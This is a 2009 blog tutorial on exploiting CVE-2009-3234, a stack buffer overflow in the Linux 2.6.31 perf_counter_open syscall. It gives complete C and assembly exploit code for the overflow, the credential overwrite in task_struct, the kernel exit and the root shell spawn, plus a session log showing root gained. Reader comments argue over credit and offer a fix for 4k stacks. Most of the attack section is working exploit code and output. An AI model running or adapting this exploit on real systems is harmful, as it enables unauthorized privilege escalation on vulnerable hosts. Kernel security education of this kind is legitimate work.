Linux kernel 2.6.31 perf_counter_open exploit
Well, it has been a while since my last technical post … More than 1 year ?!? Wow, time runs so fast
So let’s go for a post about Linux kernel exploitation (yeah, I know, sounds cool). We will exploit a quite recent bug in kernel 2.6.31 (still unpatched while writing this) in the perf_counter_open syscall (CVE 2009-3234) to gain root privileges. As real hackers say, f34R.
But, let’s start by the begining: the bug.
perf_copy_attr and the dual fail
The perf_copy_attr method is meant to copy a data structure (of type perf_count_attr) from user space to kernel space. Its definition is:
1 2 | static int perf_copy_attr(struct perf_counter_attr __user *uattr, struct perf_counter_attr *attr) |
With uattr being a pointer to the (source) user space structure, and attr being a pointer to the (destination) kernel space structure.
Here is the perf_copy_attr code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | static int perf_copy_attr(struct perf_counter_attr __user *uattr, struct perf_counter_attr *attr) { [...] u32 size; [...] ret = get_user(size, &uattr->size); [...] /* * If we're handed a bigger struct than we know of, * ensure all the unknown bits are 0. */ if (size > sizeof(*attr)) { unsigned long val; unsigned long __user *addr; unsigned long __user *end; addr = PTR_ALIGN((void __user *)uattr + sizeof(*attr), sizeof(unsigned long)); end = PTR_ALIGN((void __user *)uattr + size, sizeof(unsigned long)); for (; addr < end; addr += sizeof(unsigned long)) { ret = get_user(val, addr); if (ret) return ret; if (val) goto err_size; } } ret = copy_from_user(attr, uattr, size); [...] } |
Let’s look at what is happening:
First, size is copied from the user data :
7 | ret = get_user(size, &uattr->size); |
Then, size bytes from user buffer pointed by uattr are copied to kernel buffer pointed by attr:
32 | ret = copy_from_user(attr, uattr, size); |
This means that if the user supply uattr with uattr->size greater than the size of the buffer pointed by attr, the buffer will be overflowed. That’s the first fail.
But in between lines 7 and 32, there is comment followed by a block of code. This comment says:
9 10 11 12 | /*
* If we're handed a bigger struct than we know of,
* ensure all the unknown bits are 0.
*/ |
Without reading the code, you would think that you can overflow the buffer only with zeros, which, while not making the exploitation impossible, makes it more difficult. But, if you read the code, you will see this:
15 | unsigned long __user *addr; |
23 24 25 26 27 28 29 | for (; addr < end; addr += sizeof(unsigned long)) { ret = get_user(val, addr); if (ret) return ret; if (val) goto err_size; } |
As pointer’s arithmetic says that adding 1 to a pointer adds the size of the pointed value to the offset contained in the pointer, thus addr += sizeof(unsigned long) adds 4*4 to the offset contained in addr on a 32 bits system.
This means that this loop checks that 1 long equals 0 every 4 longs. That’s the second fail
Exploitation
Note:
If you are not comfortable with stack based buffer overflow, you should first read this famous article from Aleph1: Smashing The Stack For Fun And Profit
The interesting thing for us is that perf_copy_attr is called directly from the perf_counter_open syscall and that the destination buffer is on the stack, so it’s a typical stack based buffer overflow :
1 2 3 4 5 6 7 8 9 | SYSCALL_DEFINE5(perf_counter_open, struct perf_counter_attr __user *, attr_uptr, pid_t, pid, int, cpu, int, group_fd, unsigned long, flags) { [...] struct perf_counter_attr attr; [...] ret = perf_copy_attr(attr_uptr, &attr); [...] |
Now, let’s have a look at the perf_counter_attr structure:
1 2 3 4 5 6 7 | /* * Hardware event to monitor via a performance monitoring counter: */ struct perf_counter_attr { __u32 type; __u32 size; [...] /* Total struct length: 64 bytes */ |
To trigger the overflow and modify the kernel code flow, we need to make an attr buffer so:
- attr.size > sizeof(struct perf_counter_attr)
- After the first 64 bytes of our buffer, we place zeroes so the loop in perf_copy_attr would not kick us
- Rewrite the perf_counter_open return address located in the stack to our code
Modifying the kernel code flow
Note:
Before continuing, something you should remember is that the Linux kernel shares the address space of the process, so you can access to your process’ memory from the kernel quite as easily as if you were accessing it from your program.
The following code is self-explanatory. We start by setting attr.size to 128, then the first loop fill the part of attr which will overflow with the address we want to jump to when in kernel-land, and the second loop puts 0s where needed so we will pass the loop test in perf_copy_attr. At the end, we just make a syscall to perf_counter_open.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | #define SIZEOF_ATTR 64 #define BUFFER_LEN 128 void start() { uint32_t *attr = malloc(BUFFER_LEN); uint32_t *stack_overflow = (void *)attr + SIZEOF_ATTR; uint32_t *aligned_overflow = PTR_ALIGN(stack_overflow, sizeof(unsigned long)); memset(attr, 0, SIZEOF_ATTR); /* size is the second u32 in the struct */ attr[1] = 128; while (stack_overflow < attr + (BUFFER_LEN / sizeof (*attr))) { *stack_overflow = (uint32_t)kernel_code; stack_overflow ++; } /* then put 0s where we need them ... */ while (aligned_overflow < attr + (BUFFER_LEN / sizeof (*attr))) { *aligned_overflow = 0; aligned_overflow += 4; } syscall(__NR_perf_counter_open, attr, 0, 0, 0, 0); } |
So, if all wants well when the perf_counter_open function returns, the code flow should be redirected to our code and executed with kernel privileges (ring0).
The Kernel trip
What we need to do while in ring0 (kernel land), is to modify the credentials of our process to get the root privileges and exit the kernel. So, when back in ring3 (user land) we will start a shell from our process with the root privileges.
We start by writing our kernel_code function as this:
1 2 3 4 5 | void kernel_code() { update_cred(); exit_kernel(); } |
Upgrading credentials
Credentials of a process are stored in the task_struct. The task_struct is a huge structure holding everything about a process. The current process’ task_struct address is always stored on top of the kernel stack – sizeof(long).
The task_struct can be organised in different ways depending of kernel compilation options. So, even with the address of this structure, we cannot calculate to exact position of the credential-related fields. On latest kernel, credential are stored in cred structure pointed by the task_struct.
Here is how the task_struct links the credentials:
1 2 3 4 5 6 7 8 | struct task_struct { [...] /* process credentials */ const struct cred *real_cred; /* objective and real subjective task * credentials (COW) */ const struct cred *cred; /* effective (overridable) subjective task * credentials (COW) */ [...] |
And here is the cred structure:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | struct cred { atomic_t usage; uid_t uid; /* real UID of the task */ gid_t gid; /* real GID of the task */ uid_t suid; /* saved UID of the task */ gid_t sgid; /* saved GID of the task */ uid_t euid; /* effective UID of the task */ gid_t egid; /* effective GID of the task */ uid_t fsuid; /* UID for VFS ops */ gid_t fsgid; /* GID for VFS ops */ unsigned securebits; /* SUID-less security management */ kernel_cap_t cap_inheritable; /* caps our children can inherit */ kernel_cap_t cap_permitted; /* caps we're permitted */ kernel_cap_t cap_effective; /* caps we can actually use */ kernel_cap_t cap_bset; /* capability bounding set */ #ifdef CONFIG_KEYS unsigned char jit_keyring; /* default keyring to attach requested * keys to */ struct key *thread_keyring; /* keyring private to this thread */ struct key *request_key_auth; /* assumed request_key authority */ struct thread_group_cred *tgcred; /* thread-group shared credentials */ #endif #ifdef CONFIG_SECURITY void *security; /* subjective LSM security */ #endif struct user_struct *user; /* real user ID subscription */ struct group_info *group_info; /* supplementary groups for euid/fsgid */ struct rcu_head rcu; /* RCU deletion hook */ }; |
As you may have noticed, task_struct links two cred structures. Under normal circumstances, the two pointers have the same value, thus pointing to the same cred structure.
This plus the very special definition of the cred structure having all the UIDs/GIDs side by side define a special signature.
We will be able to find the cred structure’s address by walking the task_struct searching for two field having the same exact value and looking like pointers to objects in the kernel memory space.
Then we will check if the pointed memory looks like a cred structure by looking at the UIDs/GIDs suite.
When the cred structure will be found, we will just have to put 0s in the UIDs and GIDs to make our process have the root privileges.
Here is the code of our update_cred function:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | static void update_cred() { uint32_t i; uint32_t *task = get_current(); /* Pointer to the task_struct */ uint32_t *cred = 0; for (i = 0; i < 1024; i++) { cred = (uint32_t *)task[i]; if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) { cred++; /* Get ride of the cred's 'usage' field */ if (cred[0] == uid && cred[1] == gid && cred[2] == uid && cred[3] == gid && cred[4] == uid && cred[5] == gid && cred[6] == uid && cred[7] == gid) { /* Get root */ cred[0] = cred[2] = cred[4] = cred[6] = 0; cred[1] = cred[3] = cred[5] = cred[7] = 0; break; } } } } |
Well, we now need to go back to our process …
Exiting kernel
Exiting kernel will not be difficult, all we have to do is to prepare the stack and call the iret instruction.
As defined in the Intel manuals, iret returns control to the program. When calling iret the processor pops data from the stack and place it in the EIP register, CS segment register, EFLAGS register, ESP register and finally SS segment register.
The segment registers and EFLAGS will be set to “standard” value while we will give an address for ESP pointing to a memory buffer defined in our program (exit_stack), and the address of our spawn_shell function for EIP.
After the iret instruction will be executed we will be back in our program, at the start of the spawn_shell function, in user mode with the root’s privileges.
Here is the code:
1 2 3 4 5 6 7 8 9 10 11 12 13 | static void exit_kernel() { __asm__ __volatile__ ( "movl %0, 0x10(%%esp) ;" "movl %1, 0x0c(%%esp) ;" "movl %2, 0x08(%%esp) ;" "movl %3, 0x04(%%esp) ;" "movl %4, 0x00(%%esp) ;" "iret" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (spawn_shell) ); } |
Last, but not least … spawning a shell !
Now, we are back in user land (ring3), and as we changed our stack address, and smashed some segment registers (like GS), we will not rely on the libc. So, we will start our shell in assembler. It’s quite simple: A syscall to write to print a message, and then a syscall to execve to start the shell;
spawn_shell:
1 2 3 4 5 6 7 8 | static inline void spawn_shell() { static char *s = "Starting shell\n"; static char *t[] = {"/bin/sh", 0}; my_syscall(SYS_write, 1, (unsigned int)s, mystrlen(s), 0, 0); my_syscall(SYS_execve, (unsigned int)*t, (unsigned int)t, 0, 0, 0); } |
my_syscall:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | unsigned int my_syscall(unsigned int nb, unsigned int arg1, unsigned int arg2, unsigned int arg3, unsigned int arg4, unsigned int arg5) { unsigned int ret; __asm__ ( "mov %1, %%eax ;" "mov %2, %%ebx ;" "mov %3, %%ecx ;" "mov %4, %%edx ;" "mov %5, %%esi ;" "mov %6, %%edi ;" "int $0x80 ;" "mov %%eax, %0 ;" : "=r" (ret) : "m" (nb), "m" (arg1), "m" (arg2), "m" (arg3), "m" (arg4), "m" (arg5) ); return ret; } |
And we are done !
You should now have a root shell
This is the result on a ubuntu jaunty host with a 2.6.31 kernel (from ubuntu repositories):
xipe@tomate:~/exploit$ xipe@tomate:~/exploit$ id uid=1000(xipe) gid=1000(xipe) groups=4(adm),20(dialout),24(cdrom),29(audio),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(xipe) xipe@tomate:~/exploit$ ./sys_perf_counter_open_sploit Starting shell # id uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),29(audio),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(xipe) # uname -a Linux tomate 2.6.31-10-generic #34-Ubuntu SMP Wed Sep 16 00:23:19 UTC 2009 i686 GNU/Linux #
Exploit code
The exploit code and binary can be found here:
Download source
Download binary
That’s all folks ! Have fun !
September 24th, 2009 at 17:07
Not only are you 8 days late to the game (I published an analysis of the bug and posted my exploit for x86/x64 on the 16th), you could at least credit the people whose code you ripped (namely qaaz’s vmsplice exploit).
The better exploit has been at http://grsecurity.net/~spender/enlightenment.tgz
Why reinvent the wheel?
-Brad
September 24th, 2009 at 17:33
Hi spender,
Yes, I used the exit_kernel from the vmsplice exploit coded by qaaz, I am happy you saw it … the fact is it’s 7 lines of asm that are not so difficult to write if you read the Intel manual
Also, I didn’t know that it was forbidden to write something is someone else already wrote on the subject … btw, could you give me the URL of your analysis, I would be happy to read it ?
Last thing: This article is more like a “How To” than a cutting-edge exploitation technique … I chose this bug because it was an easily exploitable bug, not because I wanted to be the first writing on it. I
think (and hope) my post would help people wanting to gain some base knowledge about exploiting the Linux kernel.
Best regards, and relax
- Xipe
September 24th, 2009 at 18:23
http://twitter.com/spendergrsec
Scroll down to the 16th
(it was referenced by the mail to oss-security about the kernel vulnerability)
September 24th, 2009 at 18:38
Great, I am now following you on twitter
September 24th, 2009 at 18:55
Yeah… heaven forbid someone use the documented way to return across ring boundaries. Brad, you do good research. I’ll give you that. But you sure do fucking whine and cry a lot about shit. Does your ego really not get fed enough? Jesus man..
September 24th, 2009 at 19:17
I wasn’t asking credit for myself (since he obviously hadn’t seen the work I had done), just for the person whose code they ripped (including the get_stack_top code which doesn’t work on 4k stacks). It’s common courtesy.
September 24th, 2009 at 19:33
spender, concerning the code that doesn’t work on 4k stacks … I wrote it as documented in Understanding Linux Kernel 3th edition … please just stop
For people reading this and wanting to run the exploit on a 4k stack, you should change the “movl $0xffffe000,%%eax ;” with “movl $0xfffff000,%%eax ;”
Best regards,
- Xipe
September 25th, 2009 at 04:15
Xipe, thanks for the walk-through. For those not familiar with kernel exploitation, it\’s a good read and educational. Spender, if you read this, your code and research are top-notch, and grsecurity is a valuable addition to our world. But your apparent arrogance and harsh criticism of others, including the elitist arrogance of calling others idiots sends a big fat pointer towards your own ego-trip. I\’m sure you popped out of the womb knowing everything. Cool the ego and life will be better.
October 10th, 2009 at 07:06
Spender has always been out for glory, it’s common news that he stole the whole grsecurity ideology, I mean — a bug was discovered, and exploited over a week ago, and he scouts the internet for blogs that talk about it without giving credit to him and qaaz, funny how it’s not qaaz that complains
— Good work xipe, continue posting more, I’m sure a lot of people congratulate your efforts.
October 10th, 2009 at 07:16
Also, credits should go to Silvio Cesare for being the first to use iret in 03, so there!
October 10th, 2009 at 16:16
Thank you Keen
- Xipe
October 13th, 2009 at 22:41
excellent writeup!
October 18th, 2009 at 15:04
Nice post.
October 31st, 2009 at 01:18
Write more !